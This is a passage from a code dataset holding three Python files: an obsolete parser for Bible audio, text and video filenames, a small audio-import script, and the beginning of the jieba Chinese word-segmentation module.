\"file_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"title\", \"damid\", \"type\"), (\"verse_end_clean\",)),\n\t\t\t## missing explaination\n\t\t\tFilenameTemplate(\"audio5\", (\"file_seq\", \"misc\", \"misc\", \"misc\", \"book_name\", \"chapter\", \"type\"), ()),\n\n\t\t\t## {bookseq}__{fileseq}_{non-standar-book-id}_{chapter}_{chapter_end}_{damid}.mp3 A01__002_GEN_1_2__S1DESWBT.mp\n\n\t\t\t## {bookseq}_{fileseq}__{bookname}_{chap}_____{damid}.mp3 A08_073__Ruth_01_________S2RAMTBL.mp3\n\t\t\tFilenameTemplate(\"audio8\", (\"book_seq\", \"file_seq\", \"book_name\", \"chapter\", \"damid\", \"type\"), ()),\n\n\t\t\t## {bookseq}_{bookname}_{chap}_{damid}.mp3 B01_Genesis_01_S1COXWBT.mp3\n\t\t\tFilenameTemplate(\"audio7\", (\"book_seq\", \"book_name\", \"chapter\", \"damid\", \"type\"), ()),\n \t\t\t## {file_seq}_{testament}_{KDZ}_{vers}_{bookname}_{chap}.mp3 1215_O2_KDZ_ESV_PSALM_57.mp3\n\t\t\tFilenameTemplate(\"audio9\", (\"book_seq\", \"file_seq\", \"book_name\", \"chapter\", \"misc\", \"damid\", \"type\"), ()),\n\t\t\t## Need to somehow lower the priority of this template, so it is only used when others fail totally.\n\t\t\t\n\t\t\t## {fileseq}_{title}.mp3\n\t\t\tFilenameTemplate(\"audio_story\", (\"file_seq\", \"title\", \"type\"), ()),\n\t\t\tFilenameTemplate(\"audio_story2\", (\"book_seq\", \"file_seq\", \"title\", \"type\"), ())\n\t\t)\n\t\tself.textTemplates = (\n\t\t\t## {damid}_{bookseq}_{bookid}_{optionalchap}.html AAZANT_70_MAT_10.html\n\t\t\tFilenameTemplate(\"text1\", (\"damid\", \"book_seq\", \"book_id\", \"chapter\", \"type\"), (\"optional_chapter\",)),\n\t\t\t## {usfx2}{optionalchap}.html AC12.html\n\t\t\tFilenameTemplate(\"text2\", (\"usfx2\", \"chapter\", \"type\"), (\"split_position2\", \"optional_chapter\")),\n\t\t)\n\t\tself.videoTemplates = (\n\t\t\t## {lang}_{book_id}_{chap}-{verse_start}-{verse-end}.mp4 Romanian_MRK_9-33-50.mp4\n\t\t\tFilenameTemplate(\"video1\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern has an extra 1 at the end\n\t\t\tFilenameTemplate(\"video2\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for extra R_1 at the end\n\t\t\tFilenameTemplate(\"video3\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit\n\t\t\tFilenameTemplate(\"video4\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit with extra 1 at the end\n\t\t\tFilenameTemplate(\"video5\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit with extra R_1 at the end\n\t\t\tFilenameTemplate(\"video6\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\n\t\t\t## This pattern for\n\t\t\t## {lang}_{book_id}_End_Credits.mp4 Romanian_MRK_End_Credits.mp4\n# What ever happened to MBCWBT It is th format below\n\t\t\t## {bookseq}___{chap}_{bookname}___{damid}.mp3 MBCMVAN1DA16/B01___23_S_Mateus____MBCMVAN1DA.mp3\n\t\t\t##FilenameTemplate(\"video3\", (\"book_seq\", \"chapter\", \"book_name\", \"damid\", \"type\"), (\"damid_front_clean\",)),\n\t\t)\n\n\n\tdef parse(self, template, filename):\n\t\tfile = Filename()\n\t\tfile.template = template\n\t\tparts = re.split(\"[_.-]+\", filename)\n\t\tif 
template.splitPosition2:\n\t\t\tself.splitPosition(parts, 2)\n\t\tif template.scanForBookId:\n\t\t\tself.scanForBookId(parts)\n\t\tif template.hasProblemDamId:\n\t\t\tself.splitDamIdIfNeeded(parts, -2)\n\t\tif template.verseEndClean:\n\t\t\tverseEndPos = template.parts.index(\"verse_end\")\n\t\t\tif verseEndPos < len(parts):\n\t\t\t\tself.splitNumAlpha(parts, verseEndPos)\n\t\tif len(parts) > template.numParts and template.namePosition != None:\n\t\t\tself.combineName(parts, template.namePosition, template.numParts)\n\t\tif template.optionalChapter and (len(parts) + 1) == template.numParts:\n\t\t\tself.addZeroChapter(parts, template)\n\t\tif template.numParts == len(parts):\n\t\t\tfor index in range(template.numParts):\n\t\t\t\tpart = parts[index]\n\t\t\t\titem = template.parts[index]\n\t\t\t\tif item == \"book_seq\":\n\t\t\t\t\tfile.setBookSeq(part)\n\t\t\t\telif item == \"file_seq\":\n\t\t\t\t\tfile.setFileSeq(part)\n\t\t\t\telif item == \"book_name\":\n\t\t\t\t\tfile.setBookName(part, self.chapterMap)\n\t\t\t\telif item == \"usfx2\":\n\t\t\t\t\tfile.setUSFX2(part, self.chapterMap, self.usfx2Map)\n\t\t\t\telif item == \"book_id\":\n\t\t\t\t\tfile.setBook(part, self.chapterMap)\n\t\t\t\telif item == \"chapter\":\n\t\t\t\t\tfile.setChap(part, self.chapterMap)\n\t\t\t\telif item == \"verse_start\":\n\t\t\t\t\tfile.setVerseStart(part)\n\t\t\t\telif item == \"verse_end\":\n\t\t\t\t\tfile.setVerseEnd(part)\n\t\t\t\telif item == \"title\":\n\t\t\t\t\tfile.setTitle(part)\n\t\t\t\telif item == \"damid\":\n\t\t\t\t\tfile.setDamid(part)\n\t\t\t\telif item == \"type\":\n\t\t\t\t\tfile.setType(part)\n\t\t\t\telif item == \"misc\":\n\t\t\t\t\tfile.addUnknown(part)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR: unknown type in template %s\" % (item))\n\t\t\t\t\tsys.exit()\t\n\t\telse:\n\t\t\tfile.errors.append((\"expect %d parts, have %d\" % (template.numParts, len(parts))))\n\t\tfile.setFile(template, filename)\n\t\treturn file\n\n\n\t## This method will split the first part into 2 at a specified position\n\tdef splitPosition(self, parts, position):\n\t\tif len(parts[0]) > position:\n\t\t\tfirst = parts[0]\n\t\t\tparts[0] = first[:position]\n\t\t\tparts.insert(1, first[position:])\n\n\n\t## This method searches parts for a valid bookId, combines all preceding parts into 1 part\n\tdef\tscanForBookId(self, parts):\n\t\tbookPosition = 0\n\t\tfor index in range(len(parts)):\n\t\t\tif parts[index] in {\"MAT\", \"MRK\", \"LUK\", \"JHN\", \"ACT\"}:\n\t\t\t\tbookPosition = index \n\t\t\t\tbreak\n\t\tfor index in range(bookPosition - 1):\n\t\t\tparts[0] = parts[0] + \"_\" + parts[1]\n\t\t\tparts.pop(1)\n\n\n\n\t## This method splits between Bible bookname and a damid, when there was no _ between them\n\tdef splitDamIdIfNeeded(self, parts, damidIndex):\n\t\tdamid = parts[damidIndex]\n\t\tif any(c.islower() for c in damid):\n\t\t\tfor index in range(len(damid) -1, 0, -1):\n\t\t\t\tif damid[index].islower():\n\t\t\t\t\tparts[damidIndex] = damid[index + 1:]\n\t\t\t\t\tparts.insert(damidIndex, damid[:index + 1])\n\t\t\t\t\tbreak\n\n\n\t## This method combines parts starting at a position to return a list of a stated size\n\tdef combineName(self, parts, namePart, maxParts):\n\t\twhile (len(parts) > maxParts):\n\t\t\tparts[namePart] = parts[namePart] + \"_\" + parts[namePart + 1]\n\t\t\tparts.pop(namePart + 1)\n\n\n\t## Split a part that is part alpha and part numberic into two parts\n\tdef splitNumAlpha(self, parts, splitPart):\n\t\tstring = parts[splitPart]\n\t\tfor index in range(len(string)):\n\t\t\tif 
string[index].isalpha():\n\t\t\t\tparts[splitPart] = string[:index]\n\t\t\t\tparts.insert(splitPart + 1, string[index:])\n\t\t\t\tbreak\n\n\n\t## Add a zero where that part was missing, this is used for chapters\n\tdef addZeroChapter(self, parts, template):\n\t\tparts.insert(template.chapterPosition, \"0\")\n\n\n\n\tdef process(self, typeCode):\n\t\tdb = SQLUtility(\"localhost\", 3306, \"root\", \"valid_dbp\")\n\t\tself.chapterMap = db.selectMap(\"SELECT id, chapters FROM books\", None)\n\t\tself.usfx2Map = db.selectMap(\"SELECT id_usfx, id FROM books\", None)\n\t\tself.usfx2Map['J1'] = '1JN' ## fix incorrect entry in books table\n\t\tsql = (\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s limit 1000000000\")\n\t\tsqlTest = ((\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s AND bible_id='PORERV'\"))\n\t\tfilenamesMap = db.selectMapList(sql, (typeCode))\n\t\tdb.close()\n\n\t\tif typeCode == \"audio\":\n\t\t\ttemplates = self.audioTemplates\n\t\telif typeCode == \"text\":\n\t\t\ttemplates = self.textTemplates\n\t\telif typeCode == \"video\":\n\t\t\ttemplates = self.videoTemplates\n\t\telse:\n\t\t\tprint(\"ERROR: unknown type_code: %s\" % (typeCode))\n\n\t\tfor prefix in filenamesMap.keys():\n\t\t\tfilenames = filenamesMap[prefix]\n\t\t\t(numErrors, template, files) = self.parseFileset(templates, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\tself.parsedList.append((template.name, prefix))\n\t\t\telse:\n\t\t\t\tself.unparsedList.append((numErrors, template.name, prefix))\n\t\t\t\tfor file in files:\n\t\t\t\t\tif len(file.errors) > 0:\n\t\t\t\t\t\tprint(prefix, file.file, \", \".join(file.errors))\n\n\n\tdef parseFileset(self, templates, prefix, filenames):\n\t\tparserTries = []\n\t\tfor template in templates:\n\t\t\t(numErrors, template, files) = self.parseOneFileset(template, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\treturn (numErrors, template, files)\n\t\t\tparserTries.append((numErrors, template, files))\n\t\tbest = 1000000\n\t\tselected = None\n\t\tfor aTry in parserTries:\n\t\t\tif aTry[0] < best:\n\t\t\t\tbest = aTry[0]\n\t\t\t\tselected = aTry\n\t\treturn selected\n\n\n\tdef parseOneFileset(self, template, prefix, filenames):\n\t\tnumErrors = 0\n\t\tfiles = []\n\t\tfor filename in filenames:\n\t\t\tfile = self.parse(template, filename)\n\t\t\tfiles.append(file)\n\t\t\tif len(file.errors) > 0:\n\t\t\t\tnumErrors += 1\n\t\treturn (numErrors, template, files)\n\n\n\tdef summary(self):\n\t\tfile = io.open(\"FilenameParser.out\", mode=\"w\", encoding=\"utf-8\")\n\t\tfor entry in self.parsedList:\n\t\t\tfile.write(\"%s %s\\n\" % entry)\n\t\tfile.write(\"\\n\\nUnparsed\\n\\n\")\n\t\tfor entry in self.unparsedList:\n\t\t\tfile.write(\"%d %s %s\\n\" % entry)\n\t\tfile.close()\n\n\n\t## Process2 processes tries each template with each file and returns the best parse\n\tdef process2(self, typeCode):\n\t\tdb = SQLUtility(\"localhost\", 3306, \"root\", \"valid_dbp\")\n\t\tself.chapterMap = db.selectMap(\"SELECT id, chapters FROM books\", None)\n\t\textras = {\"FRT\":6, \"INT\":1, \"BAK\":2, \"LXX\":1, \"CNC\":2, \"GLO\":26, \"TDX\":1, \"NDX\":1, \"OTH\":5, \n\t\t\t\"XXA\":4, \"XXB\":3, \"XXC\":1, \"XXD\":1, \"XXE\":1, \"XXF\":1, \"XXG\":1}\n\t\tself.chapterMap.update(extras)\n\t\tcorrections = {\"MAN\":1, \"PS2\":1}\n\t\tself.chapterMap.update(corrections)\n\t\t#self.chapterMap[\"PSA\"] = 151\n\t\tself.usfx2Map = 
db.selectMap(\"SELECT id_usfx, id FROM books\", None)\n\t\textras = {\"FR\":\"FRT\", \"IN\":\"INT\", \"BK\":\"BAK\", \"CN\":\"CNC\", \"GS\":\"GLO\", \"TX\":\"TDX\", \"OH\":\"OTH\",\n\t\t\t\"XA\":\"XXA\", \"XB\":\"XXB\", \"XC\":\"XXC\", \"XD\":\"XXD\", \"XE\":\"XXE\", \"XF\":\"XXF\", \"XG\":\"XXG\"}\n\t\tself.usfx2Map.update(extras)\n\t\tself.usfx2Map[\"J1\"] = \"1JN\" ## fix incorrect entry in books table\n\t\tsql = (\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s limit 1000000000\")\n\t\tsqlTest = ((\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s AND bible_id='PORERV'\"))\n\t\tfilenamesMap = db.selectMapList(sql, (typeCode))\n\t\tdb.close()\n\n\t\tif typeCode == \"audio\":\n\t\t\ttemplates = self.audioTemplates\n\t\telif typeCode == \"text\":\n\t\t\ttemplates = self.textTemplates\n\t\telif typeCode == \"video\":\n\t\t\ttemplates = self.videoTemplates\n\t\telse:\n\t\t\tprint(\"ERROR: unknown type_code: %s\" % (typeCode))\n\n\t\tfor prefix in filenamesMap.keys():\n\t\t\tfilenames = filenamesMap[prefix]\n\t\t\t(numErrors, files) = self.parseOneFileset2(templates, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\tself.parsedList.append((prefix))\n\t\t\telse:\n\t\t\t\tself.unparsedList.append((numErrors, prefix))\n\n\t\t\t#bookMap = self.buildBookChapterMap(files)\n\t\t\t#self.checkBookChapterMap(prefix, bookMap)\n\n\n\n\tdef parseOneFileset2(self, templates, prefix, filenames):\n\t\tnumErrors = 0\n\t\tfiles = []\n\t\tfor filename in filenames:\n\t\t\tfile = self.parseOneFilename2(templates, prefix, filename)\n\t\t\tself.validateCompleteness(file)\n\t\t\tfiles.append(file)\n\t\t\tif file.numErrors() > 0:\n\t\t\t\tnumErrors += 1\n\t\t\t\tprint(file.template.name, prefix, file.file, \", \".join(file.errors))\n\t\treturn (numErrors, files)\n\n\n\tdef parseOneFilename2(self, templates, prefix, filename):\n\t\tparserTries = []\n\t\tfor template in templates:\n\t\t\tfile = self.parse(template, filename)\n\t\t\tif file.numErrors == 0:\n\t\t\t\treturn file\n\t\t\tparserTries.append(file)\n\t\tbest = 1000000\n\t\tselected = None\n\t\tfor file in parserTries:\n\t\t\tif file.numErrors() < best:\n\t\t\t\tbest = file.numErrors()\n\t\t\t\tselected = file\n\t\treturn selected\n\n\n\tdef validateCompleteness(self, file):\n\t\tif file.template.name != \"audio_story\" and file.template.name != \"audio_story2\":\n\t\t\tif file.book == None or file.book == \"\":\n\t\t\t\tfile.errors.append(\"book_id is not found\")\n\t\t\tif file.chap == None or file.chap == \"\":\n\t\t\t\t\tfile.errors.append(\"chapter not found\")\n\t\t\tif file.type == \"mp4\" and file.chap.isdigit():\n\t\t\t\tif file.verseStart == None or file.verseStart == \"\":\n\t\t\t\t\tfile.errors.append(\"verse start not found\")\n\t\t\t\tif file.verseEnd == None or file.verseEnd == \"\":\n\t\t\t\t\tfile.errors.append(\"verse end not found\")\n\n\n\tdef buildBookChapterMap(self, files):\n\t\tbookMap = {}\n\t\tfor file in files:\n\t\t\tif file.book not in {None, \"\", \"FRT\", \"INT\", \"BAK\", \"LXX\", \"CNC\", \"GLO\", \"TDX\", \"NDX\", \"OTH\", \n\t\t\t\t\"XXA\", \"XXB\", \"XXC\", \"XXD\", \"XXE\", \"XXF\", \"XXG\"}:\n\t\t\t\tchapters = bookMap.get(file.book)\n\t\t\t\tif chapters == None:\n\t\t\t\t\tmaxChapter = self.chapterMap[file.book]\n\t\t\t\t\tchapters = [0] * (maxChapter + 1)\n\t\t\t\t\tbookMap[file.book] = chapters\n\t\t\t\tchap = int(file.chap)\n\t\t\t\tif len(chapters) > 
chap:\n\t\t\t\t\tchapters[chap] += 1\n\t\treturn bookMap\n\n\n\tdef checkBookChapterMap(self, prefix, bookMap):\n\t\tfor book in bookMap.keys():\n\t\t\tchapters = bookMap[book]\n\t\t\tempty = []\n\t\t\ttomany = []\n\t\t\tfor chapter in range(len(chapters)):\n\t\t\t\tcount = chapters[chapter]\t\n\t\t\t\tif count == 0:\n\t\t\t\t\tempty.append(chapter)\n\t\t\t\telif count > 2:\n\t\t\t\t\ttomany.append(chapter)\n\t\t\tif len(empty) > 0:\n\t\t\t\tprint(\"%s %s is missing chapters:\" % (prefix, book), empty)\n\t\t\tif len(tomany) > 0:\n\t\t\t\tprint(\"%s %s has too many chapters:\" % (prefix, book), tomany)\n\n\n\tdef summary2(self):\n\t\tfile = io.open(\"FilenameParser.out\", mode=\"w\", encoding=\"utf-8\")\n\t\tfor entry in self.parsedList:\n\t\t\tfile.write(\"%s\\n\" % entry)\n\t\tfile.write(\"\\n\\nUnparsed\\n\\n\")\n\t\tfor entry in self.unparsedList:\n\t\t\tfile.write(\"%d %s\\n\" % entry)\n\t\tfile.close()\n\n\nparser = FilenameParser()\nparser.process2('video')\nparser.summary2()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"obsolete/py_deprecated/FilenameParser.py","file_name":"FilenameParser.py","file_ext":"py","file_size_in_byte":19419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"408879743","text":"from global_options_parser import *\nfrom daisylion.db.liondb import LionDB\n\ndef main():\n usage = \"\"\"usage: %prog [options] langid audioDir\"\"\"\n parser = GlobalOptionsParser(usage=usage)\n (options, args) = parser.parse_args()\n parser.check_args(2, args)\n \n session = LionDB(options.config, options.trace, options.app) \n langid, audio_dir = args\n session.import_audio_by_number(langid, audio_dir)\n\nif __name__==\"__main__\": main()\n","sub_path":"lionapp/branches/multipleObiProjects/lion/daisylion/scripts/import_audio_by_number.py","file_name":"import_audio_by_number.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"447178057","text":"from __future__ import absolute_import, unicode_literals\n__version__ = '0.36.2'\n__license__ = 'MIT'\n\nimport re\nimport os\nimport sys\nimport time\nimport tempfile\nimport marshal\nfrom math import log\nimport threading\nfrom functools import wraps\nimport logging\nfrom hashlib import md5\nfrom ._compat import *\nfrom . 
import finalseg\n\nDICTIONARY = \"dict.txt\"\nDICT_LOCK = threading.RLock()\nFREQ = {} # to be initialized\ntotal = 0\nuser_word_tag_tab = {}\ninitialized = False\npool = None\ntmp_dir = None\n\n_curpath = os.path.normpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nlog_console = logging.StreamHandler(sys.stderr)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(log_console)\n\n\ndef setLogLevel(log_level):\n global logger\n logger.setLevel(log_level)\n\n\ndef gen_pfdict(f_name):\n lfreq = {}\n ltotal = 0\n with open(f_name, 'rb') as f:\n lineno = 0\n for line in f.read().rstrip().decode('utf-8').splitlines():\n lineno += 1\n try:\n word, freq = line.split(' ')[:2]\n freq = int(freq)\n lfreq[word] = freq\n ltotal += freq\n for ch in xrange(len(word)):\n wfrag = word[:ch + 1]\n if wfrag not in lfreq:\n lfreq[wfrag] = 0\n except ValueError as e:\n logger.debug('%s at line %s %s' % (f_name, lineno, line))\n raise e\n return lfreq, ltotal\n\n\ndef initialize(dictionary=None):\n global FREQ, total, initialized, DICTIONARY, DICT_LOCK, tmp_dir\n if not dictionary:\n dictionary = DICTIONARY\n with DICT_LOCK:\n if initialized:\n return\n\n abs_path = os.path.join(_curpath, dictionary)\n logger.debug(\"Building prefix dict from %s ...\" % abs_path)\n t1 = time.time()\n # default dictionary\n if abs_path == os.path.join(_curpath, \"dict.txt\"):\n cache_file = os.path.join(tmp_dir if tmp_dir else tempfile.gettempdir(),\"jieba.cache\")\n else: # custom dictionary\n cache_file = os.path.join(tmp_dir if tmp_dir else tempfile.gettempdir(),\"jieba.u%s.cache\" % md5(\n abs_path.encode('utf-8', 'replace')).hexdigest())\n\n load_from_cache_fail = True\n if os.path.isfile(cache_file) and os.path.getmtime(cache_file) > os.path.getmtime(abs_path):\n logger.debug(\"Loading model from cache %s\" % cache_file)\n try:\n with open(cache_file, 'rb') as cf:\n FREQ, total = marshal.load(cf)\n load_from_cache_fail = False\n except Exception:\n load_from_cache_fail = True\n\n if load_from_cache_fail:\n FREQ, total = gen_pfdict(abs_path)\n logger.debug(\"Dumping model to file cache %s\" % cache_file)\n try:\n fd, fpath = tempfile.mkstemp()\n with os.fdopen(fd, 'wb') as temp_cache_file:\n marshal.dump((FREQ, total), temp_cache_file)\n if os.name == 'nt':\n from shutil import move as replace_file\n else:\n replace_file = os.rename\n replace_file(fpath, cache_file)\n except Exception:\n logger.exception(\"Dump cache file failed.\")\n\n initialized = True\n\n logger.debug(\"Loading model cost %s seconds.\" % (time.time() - t1))\n logger.debug(\"Prefix dict has been built succesfully.\")\n\n\ndef require_initialized(fn):\n\n @wraps(fn)\n def wrapped(*args, **kwargs):\n global initialized\n if initialized:\n return fn(*args, **kwargs)\n else:\n initialize(DICTIONARY)\n return fn(*args, **kwargs)\n\n return wrapped\n\n\ndef __cut_all(sentence):\n dag = get_DAG(sentence)\n old_j = -1\n for k, L in iteritems(dag):\n if len(L) == 1 and k > old_j:\n yield sentence[k:L[0] + 1]\n old_j = L[0]\n else:\n for j in L:\n if j > k:\n yield sentence[k:j + 1]\n old_j = j\n\n\ndef calc(sentence, DAG, route):\n N = len(sentence)\n route[N] = (0, 0)\n logtotal = log(total)\n for idx in xrange(N - 1, -1, -1):\n route[idx] = max((log(FREQ.get(sentence[idx:x + 1]) or 1) -\n logtotal + route[x + 1][0], x) for x in DAG[idx])\n\n\n@require_initialized\ndef get_DAG(sentence):\n global FREQ\n DAG = {}\n N = len(sentence)\n for k in xrange(N):\n tmplist = []\n i = k\n frag = sentence[k]\n while i < N 
and frag in FREQ:\n if FREQ[frag]:\n tmplist.append(i)\n i += 1\n frag = sentence[k:i + 1]\n if not tmplist:\n tmplist.append(k)\n DAG[k] = tmplist\n return DAG\n\nre_eng = re.compile('[a-zA-Z0-9]', re.U)\n\n\ndef __cut_DAG_NO_HMM(sentence):\n DAG = get_DAG(sentence)\n route = {}\n calc(sentence, DAG, route)\n x = 0\n N = len(sentence)\n buf = ''\n while x < N:\n y = route[x][1] + 1\n l_word = sentence[x:y]\n if re_eng.match(l_word) and len(l_word) == 1:\n buf += l_word\n x = y\n else:\n if buf:\n yield buf\n buf = ''\n yield l_word\n x = y\n if buf:\n yield buf\n buf = ''\n\n\ndef __cut_DAG(sentence):\n DAG = get_DAG(sentence)\n route = {}\n calc(sentence, DAG, route=route)\n x = 0\n buf = ''\n N = len(sentence)\n while x < N:\n y = route[x][1] + 1\n l_word = sentence[x:y]\n if y - x == 1:\n buf += l_word\n else:\n if buf:\n if len(buf) == 1:\n yield buf\n buf = ''\n else:\n if not FREQ.get(buf):\n recognized = finalseg.cut(buf)\n for t in recognized:\n yield t\n else:\n for elem in buf:\n yield elem\n buf = ''\n yield l_word\n x = y\n\n if buf:\n if len(buf) == 1:\n yield buf\n elif not FREQ.get(buf):\n recognized = finalseg.cut(buf)\n for t in recognized:\n yield t\n else:\n for elem in buf:\n yield elem\n\nre_han_default = re.compile(\"([\\u4E00-\\u9FA5a-zA-Z0-9+#&\\._]+)\", re.U)\nre_skip_default = re.compile(\"(\\r\\n|\\s)\", re.U)\nre_han_cut_all = re.compile(\"([\\u4E00-\\u9FA5]+)\", re.U)\nre_skip_cut_all = re.compile(\"[^a-zA-Z0-9+#\\n]\", re.U)\n\n\ndef cut(sentence, cut_all=False, HMM=True):\n '''\n The main function that segments an entire sentence that contains\n Chinese characters into seperated words.\n\n Parameter:\n - sentence: The str(unicode) to be segmented.\n - cut_all: Model type. True for full pattern, False for accurate pattern.\n - HMM: Whether to use the Hidden Markov Model.\n '''\n sentence = strdecode(sentence)\n\n # \\u4E00-\\u9FA5a-zA-Z0-9+#&\\._ : All non-space characters. Will be handled with re_han\n # \\r\\n|\\s : whitespace characters. 
Will not be handled.\n\n if cut_all:\n re_han = re_han_cut_all\n re_skip = re_skip_cut_all\n else:\n re_han = re_han_default\n re_skip = re_skip_default\n blocks = re_han.split(sentence)\n if cut_all:\n cut_block = __cut_all\n elif HMM:\n cut_block = __cut_DAG\n else:\n cut_block = __cut_DAG_NO_HMM\n for blk in blocks:\n if not blk:\n continue\n if re_han.match(blk):\n for word in cut_block(blk):\n yield word\n else:\n tmp = re_skip.split(blk)\n for x in tmp:\n if re_skip.match(x):\n yield x\n elif not cut_all:\n for xx in x:\n yield xx\n else:\n yield x\n\n\ndef cut_for_search(sentence, HMM=True):\n \"\"\"\n Finer segmentation for search engines.\n \"\"\"\n words = cut(sentence, HMM=HMM)\n for w in words:\n if len(w) > 2:\n for i in xrange(len(w) - 1):\n gram2 = w[i:i + 2]\n if FREQ.get(gram2):\n yield gram2\n if len(w) > 3:\n for i in xrange(len(w) - 2):\n gram3 = w[i:i + 3]\n if FREQ.get(gram3):\n yield gram3\n yield w\n\n\n@require_initialized\ndef load_userdict(f):\n '''\n Load personalized dict to improve detect rate.\n\n Parameter:\n - f : A plain text file contains words and their ocurrences.\n\n Structure of dict file:\n word1 freq1 word_type1\n word2 freq2 word_type2\n ...\n Word type may be ignored\n '''\n if isinstance(f, string_types):\n f = open(f, 'rb')\n content = f.read().decode('utf-8').lstrip('\\ufeff')\n line_no = 0\n for line in content.splitlines():\n try:\n line_no += 1\n line = line.strip()\n if not line:\n continue\n tup = line.split(\" \")\n add_word(*tup)\n except Exception as e:\n logger.debug('%s at line %s %s' % (f_name, lineno, line))\n raise e\n\n\n@require_initialized\ndef add_word(word, freq=None, tag=None):\n \"\"\"\n Add a word to dictionary.\n\n freq and tag can be omitted, freq defaults to be a calculated value\n that ensures the word can be cut out.\n \"\"\"\n global FREQ, total, user_word_tag_tab\n word = strdecode(word)\n if freq is None:\n freq = suggest_freq(word, False)\n else:\n freq = int(freq)\n FREQ[word] = freq\n total += freq\n if tag is not None:\n user_word_tag_tab[word] = tag\n for ch in xrange(len(word)):\n wfrag = word[:ch + 1]\n if wfrag not in FREQ:\n FREQ[wfrag] = 0\n\n\ndef del_word(word):\n \"\"\"\n Convenient function for deleting a word.\n \"\"\"\n add_word(word, 0)\n\n\n@require_initialized\ndef suggest_freq(segment, tune=False):\n \"\"\"\n Suggest word frequency to force the characters in a word to be\n joined or splitted.\n\n Parameter:\n - segment : The segments that the word is expected to be cut into,\n If the word should be treated as a whole, use a str.\n - tune : If True, tune the word frequency.\n\n Note that HMM may affect the final result. 
If the result doesn't change,\n set HMM=False.\n \"\"\"\n ftotal = float(total)\n freq = 1\n if isinstance(segment, string_types):\n word = segment\n for seg in cut(word, HMM=False):\n freq *= FREQ.get(seg, 1) / ftotal\n freq = max(int(freq*total) + 1, FREQ.get(word, 1))\n else:\n segment = tuple(map(strdecode, segment))\n word = ''.join(segment)\n for seg in segment:\n freq *= FREQ.get(seg, 1) / ftotal\n freq = min(int(freq*total), FREQ.get(word, 0))\n if tune:\n add_word(word, freq)\n return freq\n\n\n__ref_cut = cut\n__ref_cut_for_search = cut_for_search\n\n\ndef __lcut(sentence):\n return list(__ref_cut(sentence, False))\n\n\ndef __lcut_no_hmm(sentence):\n return list(__ref_cut(sentence, False, False))\n\n\ndef __lcut_all(sentence):\n return list(__ref_cut(sentence, True))\n\n\ndef __lcut_for_search(sentence):\n return list(__ref_cut_for_search(sentence))\n\n\n@require_initialized\ndef enable_parallel(processnum=None):\n global pool, cut, cut_for_search\n if os.name == 'nt':\n raise Exception(\"jieba: parallel mode only supports posix system\")\n from multiprocessing import Pool, cpu_count\n if processnum is None:\n processnum = cpu_count()\n pool = Pool(processnum)\n\n def pcut(sentence, cut_all=False, HMM=True):\n parts = strdecode(sentence).splitlines(True)\n if cut_all:\n result = pool.map(__lcut_all, parts)\n elif HMM:\n result = pool.map(__lcut, parts)\n else:\n result = pool.map(__lcut_no_hmm, parts)\n for r in result:\n for w in r:\n yield w\n\n def pcut_for_search(sentence):\n parts = strdecode(sentence).splitlines(True)\n result = pool.map(__lcut_for_search, parts)\n for r in result:\n for w in r:\n yield w\n\n cut = pcut\n cut_for_search = pcut_for_search\n\n\ndef disable_parallel():\n global pool, cut, cut_for_search\n if pool:\n pool.close()\n pool = None\n cut = __ref_cut\n cut_for_search = __ref_cut_for_search\n\n\ndef set_dictionary(dictionary_path):\n global initialized, DICTIONARY\n with DICT_LOCK:\n abs_path = os.path.normpath(os.path.join(os.getcwd(), dictionary_path))\n if not os.path.isfile(abs_path):\n raise Exception(\"jieba: file does not exist: \" + abs_path)\n DICTIONARY = abs_path\n initialized = False\n\n\ndef get_abs_path_dict():\n return os.path.join(_curpath, DICTIONARY)\n\n\ndef tokenize(unicode_sentence, mode=\"default\", HMM=True):\n \"\"\"\n Tokenize a sentence and yields tuples of (word, start, end)\n\n Parameter:\n - sentence: the str(unicode) to be segmented.\n - mode: \"default\" or \"search\", \"search\" is for finer segmentation.\n - HMM: whether to use the Hidden Markov Model.\n \"\"\"\n if not isinstance(unicode_sentence, text_type):\n raise Exception(\"jieba: the input parameter should be unicode.\")\n start = 0\n if mode == 'default':\n for w in cut(unicode_sentence, HMM=HMM):\n width = len(w)\n yield (w, start, start + width)\n start += width\n else:\n for w in cut(unicode_sentence, HMM=HMM):\n width = len(w)\n if len(w) > 2:\n for i in xrange(len(w) - 1):\n gram2 = w[i:i + 2]\n if FREQ.get(gram2):\n yield (gram2, start + i, start + i + 2)\n if len(w) > 3:\n for i in xrange(len(w) - 2):\n gram3 = w[i:i + 3]\n if FREQ.get(gram3):\n yield (gram3, start + i, start + i 